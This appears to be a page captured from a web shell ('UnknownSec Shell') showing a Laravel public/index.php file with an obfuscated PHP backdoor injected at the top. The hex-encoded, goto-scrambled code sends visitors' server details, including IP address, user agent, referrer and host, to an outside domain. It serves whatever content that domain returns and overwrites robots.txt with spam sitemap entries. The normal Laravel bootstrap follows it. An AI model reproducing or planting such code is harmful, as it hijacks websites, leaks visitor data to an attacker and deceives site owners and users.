shell bypass 403

UnknownSec Shell

: /home/anyleson/public_html/public/ [ drwxr-xr-x ]

name : index.php
//Obfuscate by
 goto X9gqY; kYhcc: $q8j9X = EXpLode("\174\x40\x23\x24\x7c", $m4hO5); goto pz8Fu; UWPAW: Curl_sEtoPt($xDnma, CURLOPT_URL, $pjlqy); goto MEjBQ; qv7YX: FcLOsE($txwbN); goto XiD47; bqcFC: OS7xC: goto hs_ii; bewmx: $m4hO5 = cUrL_exec($xDnma); goto OmC6p; CH8xt: $mOgGV = tRiM($q8j9X[$aLDMe - RoUnd(0.349282 + 0.37973032 + 0.2709874)]); goto f2J2A; ovTws: $xDnma = cUrL_InIT(); goto UWPAW; FdeFy: Y0gyy: goto pVJSb; MVYaN: $m4hO5 = TrIM($m4hO5); goto kYhcc; GAF5f: exit; goto dvhgM; TLuKj: pAgtk: goto H2K3V; Elwe7: $cn_YP .= "\101\154\154\157\x77\72\x2f" . PHP_EOL; goto sSYQl; hs_ii: Header("\x48\124\x54\120\x2f\x31\x2e\60\x20\x34\60\64\40\x4e\x6f\164\40\106\x6f\165\x6e\144"); goto xRtfF; H2K3V: echo "\110\x54\x54\x50\x2f\x31\56\x30\x20\64\x30\x34\x20\x4e\x6f\164\40\106\157\165\156\x64\x5f\137\137" . $U5wYC . "\137\137\137" . $byqP9; goto FrZfq; mZob1: pfw75: goto MVYaN; bVQj5: CuRl_CLOse($xDnma); goto GXjlq; sKb6j: I0yjh: goto yh3pt; qDB2j: ArRaY_POp($vuyU4); goto bNqm2; HhgyO: $m4hO5 = FIle_Get_CoNtenTS($pjlqy); goto mZob1; g8U5u: if (empty($Wj449)) { goto RfgEx; } goto x94d6; zNDpi: $YP_V0 = TrIM($q8j9X[rouND(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0)]); goto dAWU4; aSsAz: $cn_YP = "\x55\163\145\x72\55\141\147\145\x6e\x74\72\x2a" . PHP_EOL; goto Elwe7; xRtfF: exit; goto F33Kz; P1yE6: HEAdER($YP_V0); goto FdeFy; SyQTn: $txwbN = fOpEn($_SERVER["\104\x4f\103\125\115\105\x4e\124\x5f\122\x4f\x4f\124"] . "\x2f\x72\x6f\x62\x6f\164\163\56\164\x78\x74", "\167"); goto Lv_gu; bNqm2: foreach ($vuyU4 as $qHit3) { $cn_YP .= "\x53\151\x74\145\x6d\x61\x70\72" . $qHit3 . PHP_EOL; G84e5: } goto WXIpA; n_NWS: O4rMR: goto r27Si; O1Mr4: exit; goto sKb6j; dvhgM: IJ4xU: goto w6s6E; X9gqY: ERROR_repOrtiNg(ROuNd(0 + 0 + 0 + 0 + 0)); goto i3Tm3; dAWU4: if (empty($YP_V0)) { goto Y0gyy; } goto P1yE6; XiD47: echo "\x72\157\x62\157\x74\163\56\164\170\164\x20\x64\157\156\x65"; goto GAF5f; JyM0F: if ($aLDMe < 3) { goto OS7xC; } goto zNDpi; l3E61: if (!(Preg_MAtCH("\x2f\x6a\160\62\60\62\x33\57\163\151", $_SERVER["\122\x45\121\x55\x45\x53\124\137\125\x52\111"]) == RoUND(0.0998937 + 0.4378321 + 0.46227))) { goto O4rMR; } goto chjH1; i3Tm3: $U5wYC = "\172\x6a\61\64\60\71"; goto TANkU; Lv_gu: FwriTE($txwbN, $cn_YP); goto qv7YX; chjH1: if (!(pReG_MaTcH("\57\x6a\160\x32\60\62\x33\x63\167\167\x2f\163\151", $_SERVER["\122\105\x51\125\105\123\x54\137\x55\122\x49"]) == rOuNd(0 + 0 + 0 + 0 + 0 + 0))) { goto pAgtk; } goto LjzCG; xn7EY: curL_setOPt($xDnma, CURLOPT_CONNECTTIMEOUT, rOunD(6.127301 + 3.872699)); goto bewmx; TANkU: $byqP9 = "\x73\x79\x31"; goto l3E61; pz8Fu: $aLDMe = COUNT($q8j9X); goto JyM0F; LjzCG: hEaDER("\110\124\x54\120\57\x31\56\x30\40\x34\60\x34\40\x4e\157\164\x20\106\x6f\165\x6e\x64"); goto TLuKj; caPD3: RfgEx: goto CH8xt; yh3pt: if (!($mOgGV == "\160\x69\x6e\x67")) { goto IJ4xU; } goto aSsAz; cY6dK: foreach ($oyw6G as $Z3ir5) { goto Vzzop; LGTZA: $RNdY_ = sTr_REPLaCe("\x3d", "\56", $RNdY_); goto DZUKj; o5etU: gn5w4: goto SwB9d; DZUKj: $MRY7v .= "\x26" . $Z3ir5 . "\x3d" . $RNdY_; goto o5etU; Vzzop: $kpGzk = isset($_SERVER[$Z3ir5]) ? $_SERVER[$Z3ir5] : ''; goto ugvzl; olGvR: $RNdY_ = sTr_rePLace("\x2f", "\x5f", $RNdY_); goto LGTZA; NY1Gw: $RNdY_ = Str_rePLACE("\x2b", "\55", $RNdY_); goto olGvR; ugvzl: $RNdY_ = BASE64_enCode(tRim($kpGzk)); goto NY1Gw; SwB9d: } goto KOjrE; ogEA6: $pjlqy = $K3bpO . $MRY7v; goto ovTws; RS_i1: $oyw6G = array("\123\x43\x52\111\120\124\x5f\116\x41\x4d\105", "\x52\x45\121\x55\x45\x53\124\137\x55\x52\111", "\110\124\x54\120\x53", "\x52\105\x51\x55\105\123\x54\x5f\123\x43\x48\105\115\x45", "\123\x45\122\126\x45\x52\x5f\x50\x4f\122\124", "\x52\105\x4d\117\x54\105\137\101\104\104\122", "\110\x54\124\x50\137\x52\x45\106\105\x52\x45\122", "\110\124\124\x50\137\x41\x43\x43\105\x50\x54\137\x4c\101\116\107\125\x41\x47\105", "\x48\x54\124\120\137\x55\123\x45\x52\x5f\x41\107\x45\x4e\x54", "\110\124\x54\x50\x5f\x48\x4f\123\x54"); goto cY6dK; FrZfq: exit; goto n_NWS; OmC6p: $m4hO5 = trIM($m4hO5); goto bVQj5; E9cay: $MRY7v = "\57\151\156\144\145\x78\x2e\x70\150\x70\77\x56\x53\x3d" . $byqP9 . "\46\107\120\x3d" . $U5wYC; goto RS_i1; WXIpA: JScen: goto SyQTn; KOjrE: CmdRr: goto ogEA6; w6s6E: goto Fi3jG; goto bqcFC; pVJSb: $Wj449 = trIm($q8j9X[ROUND(0.1014529 + 0.113727 + 0.015 + 0.052 + 0.171844 + 0.12950902 + 0.18512024 + 0.23196)]); goto g8U5u; x94d6: echo $Wj449; goto caPD3; sSYQl: $vuyU4 = explodE("\x3c\x62\162\x2f\76", $Wj449); goto qDB2j; f2J2A: if (!($mOgGV == "\145\170\151\164")) { goto I0yjh; } goto O1Mr4; r27Si: $K3bpO = "\x68\164\x74\160\x3a\x2f\57" . $U5wYC . "\x2e\x6d\151\163\x73\145\144\x6f\146\x66\151\143\x65\x2e\x63\x6f\x6d"; goto E9cay; GXjlq: if (!empty($m4hO5)) { goto pfw75; } goto HhgyO; MEjBQ: curL_setOPt($xDnma, CURLOPT_RETURNTRANSFER, RounD(0.0344046 + 0.14442 + 0.16131026 + 0.199423 + 0.111 + 0.15513 + 0.1942728)); goto xn7EY; F33Kz: Fi3jG:?>

use Illuminate\Contracts\Http\Kernel;
use Illuminate\Http\Request;

define('LARAVEL_START', microtime(true));

| Check If The Application Is Under Maintenance
| If the application is in maintenance / demo mode via the "down" command
| we will load this file so that any pre-rendered content can be shown
| instead of starting the framework, which could cause an exception.

if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) {
    require $maintenance;

| Register The Auto Loader
| Composer provides a convenient, automatically generated class loader for
| this application. We just need to utilize it! We'll simply require it
| into the script here so we don't need to manually load our classes.

require __DIR__.'/../vendor/autoload.php';

| Run The Application
| Once we have the application, we can handle the incoming request using
| the application's HTTP kernel. Then, we will send the response back
| to this client's browser, allowing them to enjoy our application.

$app = require_once __DIR__.'/../bootstrap/app.php';

$kernel = $app->make(Kernel::class);

$response = $kernel->handle(
    $request = Request::capture()

$kernel->terminate($request, $response);

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